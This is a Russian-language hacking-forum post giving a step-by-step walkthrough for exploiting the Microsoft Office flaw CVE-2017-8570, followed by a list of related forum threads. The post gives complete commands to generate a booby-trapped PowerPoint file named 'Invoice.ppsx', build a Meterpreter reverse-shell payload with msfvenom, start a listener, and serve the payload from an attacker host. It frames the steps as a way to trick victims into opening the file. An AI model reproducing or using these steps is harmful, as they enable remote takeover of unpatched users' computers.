Уязвимость Microsoft Office CVE-2017-8570

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем привет. Сегодня разберем такую уязвимость как

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

CVE 2017 8570.



Данная уязвимость позволяет получить доступ к удаленной машине используя специально подготовленный файл PowerPoint, более подробно о ней можете почитать по ссылке:


Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.



Использована она может быть на следующих версиях:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)
На данный момент уязвимость устранена в текущих обновлениях, но, как мы знаем, что многие пренебрегают обновлениями, что нам конечно на руку.



И так поехали:

1. Заходим по ссылке

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

скачиваем, не забываем читать README.md , там будет рассмотрено три сценария атаки используя данную уязвимость. Мы в данной статье остановимся на первом сценарии.

9ce514b689865b93a02dd.png

Вкратце:

- генерируем наш вредоносный PPSX файл,

- создаем полезную нагрузку и запускаем слушатель.

- запускаем сервер на 80 порту.



Давайте непосредственно приступим к делу.

Создаем в директории «Office8570» новую папку и назовем ее «template», далее переносим файл template.ppsx в эту папку. Если этого не сделать то при генерировании PPSX файла выскочит ошибка.

0386662d61065b161b0f0.png

1.Сейчас генерируем наш PPSX файл, пишем в терминале в одну строчку следующее:

Код:
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.0.104/logo.doc



Не забываем вместо моего ip ставить свой, если кто не знает как узнать свой ip, делается это командой ifconfig. У вас должен появится файл Invoice.ppsx.

a0bc3057535e954b8bedc.png

2. Создаем полезную нагрузку,где будет создан файл shell.exe в каталоге tmp, в моем случае это будет выглядеть следующим образом:

Код:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > /tmp/shell.exe


Для создания полезной нагрузки можем использовать любой другой инструмент, не обязательно использовать msfvenom, главное перенести полезную нагрузку потом в каталог tmp.


Запускаем слушатель:

Код:
msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.0.104; set LPORT 4444; run"


3. Далее в терминале пишем следующую строчку

Код:
python cve-2017-8570_toolkit.py -M exp -e http://192.168.0.104/shell.exe -l /tmp/shell.exe


по итогу, у нас запустится сервер на 80 порту.

Далее нам осталось впарить файл Invoice.ppsx , и как только его откроют ,с сервера погрузится наша полезная нагрузка.

Всем хорошего вечера и удачного пентеста!!!
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 Уязвимость Microsoft Office становится временной бомбой в руках киберпреступников Новости в сети 0
Emilio_Gaviriya Статья Уязвимость Command Injection Exploiter. Уязвимости и взлом 0
Emilio_Gaviriya Статья Уязвимость IDOR. Вирусология 0
U Уязвимость некорректного сравнения брутим хеш при помощи захвата функции Уязвимости и взлом 0
NickelBlack Интересно Уязвимость Zero Day в Защитнике Windows AV Уязвимости и взлом 1
A Уязвимость в Zoom Новости в сети 0
F Уязвимость GMail Уязвимости и взлом 0
S Уязвимость SambaCry используется в атаках на сетевые хранилища Новости в сети 0
S Уязвимость Stack Clash позволяет повысить права на Linux и других свободных ОС Новости в сети 0
Admin Уязвимость в плагине Mail Masta Plugin 1.0 для WordPress Уязвимости и взлом 0
Support81 Не только умный, но и опасный: темная сторона ИИ от Microsoft Новости в сети 0
Support81 Пользователи Microsoft 365 рискуют потерять аккаунт: не спасёт даже МФА Новости в сети 0
Support81 Вот это поворот: Microsoft Defender стал помечать Tor Browser как вредоносное ПО Новости в сети 2
Support81 Похитители cookie: Microsoft предупреждает о росте числа атак «человек посередине» с обходом MFA Новости в сети 0
Support81 Киберпреступники активно подделывают системы авторизации Microsoft и Adobe Новости в сети 0
phantom_gift AMAZON & MICROSOFT & PAYPAL - Отработаю ваши логи Ищу работу. Предлагаю свои услуги. 1
K kamisama refund service | Amazon 15% | Logitech | Microsoft | Ищу работу. Предлагаю свои услуги. 1
Denik Интересно Хакерская группировка АРТ31 впервые атаковала российские компании Microsoft обвиняла ее в атаке на участников выборов президнта США 2020 года Новости в сети 0
J Аккаунт microsoft azure 200$ balance Дедики/VPN/соксы/ssh 0
Denik Интересно Эксперты Microsoft нашли критические баги в роутерах Netgear Новости в сети 0
E Microsoft Defender ATP принял обновление для Chrome за троянское ПО Новости в сети 1
Р Интересно Получаем Дедик microsoft Раздача dedic/ssh/proxy 1
АнАлЬнАя ЧуПаКаБрА Microsoft.com Reg Checker || XAPIC Бруты/Парсеры/Чекеры 2
АнАлЬнАя ЧуПаКаБрА Microsoft.com Brute || XAPIC Бруты/Парсеры/Чекеры 1
O Microsoft вновь латает дыру, используемую в атаках Новости в сети 0
A Microsoft и Rust против C / C ++: Другие ЯП 0
Ltybcrf Статья Как спрятать вирус в документах Microsoft Office Вирусология 1
Uno-uno Microsoft Emails Checker Бруты/Парсеры/Чекеры 2
T Microsoft STORE - БАГ $ Полезные статьи 2
K Каталог всех видеокурсов от сертифицированого Microsoft центра ITVDN Другое 0
K Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS) Уязвимости и взлом 0
H Microsoft выпустила язык квантового программирования Q# Новости в сети 0
NickelBlack Ключи Активации для Microsoft Windows 2003 Server R2 Enterprise Edition Раздача (аккаунтов/ключей) 0
E Добавление программы (вируса, RMS) в Microsoft Word (через технологию OLE) Полезные статьи 20
S Microsoft выпустила патч для Windows XP, чтобы обезопасить ОС от эксплоитов АНБ Новости в сети 0
Admin Тестирования уязвимости в продукции Microsoft Office - CVE-2017-0199 Уязвимости и взлом 0
V Бесплатный дедик от Microsoft на 3 года + тонны ключей к продуктам Microsoft Раздача dedic/ssh/proxy 42
Admin Добавление exe(вируса, RMS) в Microsoft Word (через технологию OLE) Вирусология 6
Admin Penetration Testing with Microsoft Office Уязвимости и взлом 0
RonyKing247 MIX [Selling] 303k plus || Australia Business Database || Office 365 sorted emails || Раздача email 2
bettacc78 Куплю (1xbit) Куплю аккаунты букмекерской конторы / Buy accounts bookmaker 1xbit Office Куплю/Продам 1
D Office CVE-2021-40444 remote code execution native builder Продажа софта 0
zhyba360 Бессрочная лицензия Office 365 + 5-25 ТБ OneDrive + Google Диск Корзина 5
H Как скрывают вирусы в документах Office Корзина 0
Y Продам софт Windows,Антивирусы,Набор Office Pro Plus,Google диски Продажа софта 1
АнАлЬнАя ЧуПаКаБрА MIX LOG:PASS 4k Vaild Office SMTP's Раздача email 0
W Быстрая активация любой версии Windows | Office без программ. Обновления воркают Другое 3
B Продам Продам Windows 7,10. Office 2010-2019, 365. Все что не подошло по разделу 0
K Быстрая активация любой версии Windows | Office без программ. Обновления обновляются ) Полезные статьи 2
K Взлом паролей MS Office, PDF, 7-Zip, RAR, TrueCrypt, Bitcoin/Litecoin wallet.dat, htpasswd в oclHashcat Уязвимости и взлом 0

Название темы